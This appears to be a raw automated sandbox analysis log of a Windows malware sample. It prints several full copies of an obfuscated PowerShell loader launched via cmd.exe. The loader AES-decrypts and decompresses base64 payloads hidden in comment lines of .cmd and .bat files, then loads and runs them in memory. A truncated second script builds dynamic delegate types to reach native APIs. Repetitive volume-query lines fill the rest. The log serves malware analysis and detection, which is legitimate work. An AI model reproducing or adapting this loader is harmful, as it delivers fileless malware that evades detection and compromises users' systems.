Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\users\user\desktop\1 (2).cmd';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:aywzgkditfai{param([outputtype([type])][parameter(position=0)][type[]]$fjpxtsrgmukcyl,[parameter(position=1)][type]$dkfbmaokcb)$quflgqkjgbw=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+''+[char](108)+''+[char](101)+'c'+[char](116)+''+'e'+''+[char](100)+''+'d'+''+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+'ate')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+'m'+''+[char](101)+''+'m'+'o'+[char](114)+''+[char](121)+''+[char](77)+''+'o'+''+[char](100)+''+[char](117)+'l'+'e'+'',$false).definetype('m'+[char](121)+'de'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+''+[char](84)+''+'y'+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+[char](108)+''+'i'+''+[char](99)+''+','+''+'s'+''+'e'+'a'+[char](108)+'e'+[char](100)+''+','+''+[char](65)+''+[char](110)+''+[char](115)+'i'+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+','+[char](65)+''+[char](117)+''+[char](116)+''+[char](111)+''+'c'+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$quflgqkjgbw.defineconstructor(''+[char](82)+'t'+'s'+''+[char](112)+''+'e'+''+[char](99)+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+''+[char](101)+','+'h'+''+'i'+''+'d'+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+'p'+'u'+[char](98)+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$fjpxtsrgmukcyl).setimplementationflags(''+'r'+'u'+'n'+''+'t'+''+[char](105)+''+'m'+''+[char](101)+''+','+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+'g'+[char](101)+''+[char](100)+'');$quflgqkjgbw.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'','p'+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+'c'+[char](44)+''+[char](72)+'i'+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+'i'+[char](103)+''+[char](44)+'n'+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+'t'+''+[char](44)+'v'+[char](105)+''+'r'+''+[char](116)+''+[char](117)+'a'+[char](108)+'',$dkfbmaokcb,$fjpxtsrgmukcyl).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+'i'+'m'+[char](101)+''+','+''+'m'+''+[char](97)+''+'n'+''+'a'+'g'+[char](101)+'d');write-output $quflgqkjgbw.createtype();}$wrnqvvfrvlsrh=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+'tem'+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+'m'+''+[char](105)+''+'c'+''+[char](114)+''+[char](111)+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+'.'+'w'+'i'+''+[char](110)+''+[char](51)+''+[char](50)+''
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\users\user\desktop\1 (2).cmd';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pnnxp($qgbgh){ $eocgk=[system.security.cryptography.aes]::create(); $eocgk.mode=[system.security.cryptography.ciphermode]::cbc; $eocgk.padding=[system.security.cryptography.paddingmode]::pkcs7; $eocgk.key=[system.convert]::frombase64string('y9z5o9ck+dhycwqkzoy/iwepx+o8iv9a3dgjbxpgjzk='); $eocgk.iv=[system.convert]::frombase64string('6xsbrvuro9xqg710dey/2a=='); $hrolg=$eocgk.createdecryptor(); $iczib=$hrolg.transformfinalblock($qgbgh, 0, $qgbgh.length); $hrolg.dispose(); $eocgk.dispose(); $iczib;}function yvagc($qgbgh){ invoke-expression '$kswxg=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$qgbgh);'.replace('blck', ''); invoke-expression '$qmrkw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ivnnq=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($kswxg, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ivnnq.copyto($qmrkw); $ivnnq.dispose(); $kswxg.dispose(); $qmrkw.dispose(); $qmrkw.toarray();}function bklzo($qgbgh,$hpazd){ invoke-expression '$koibj=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$qgbgh);'.replace('blck', ''); invoke-expression '$emxwr=$koibj.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$emxwr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $hpazd)blck;'.replace('blck', '');}$dgvfr = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dgvfr;$bzwpr=[system.io.file]::readalltext($dgvfr).split([environment]::newline);foreach ($bpbhj in $bzwpr) { if ($bpbhj.startswith(':: ')) { $sytfv=$bpbhj.substring(3); break; }}$ewoht=[string[]]$sytfv.split('\');invoke-expression '$fhjin=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[0])));'.replace('blck', '');invoke-expression '$gcnqy=yvagc (pnnxp (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ewoht[1])));'.replace('blck', '');bklzo $fhjin (,[string[]] (''));bklzo $gcnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,40_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,40_2_0000000140002300
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
Source: conhost.exe, 00000014.00000002.2696004459.000001B443481000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2729808580.000001B796221000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000029.00000002.2727586047.000002E991B71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000001B4448B2AF0 cpuid 20_3_000001B4448B2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
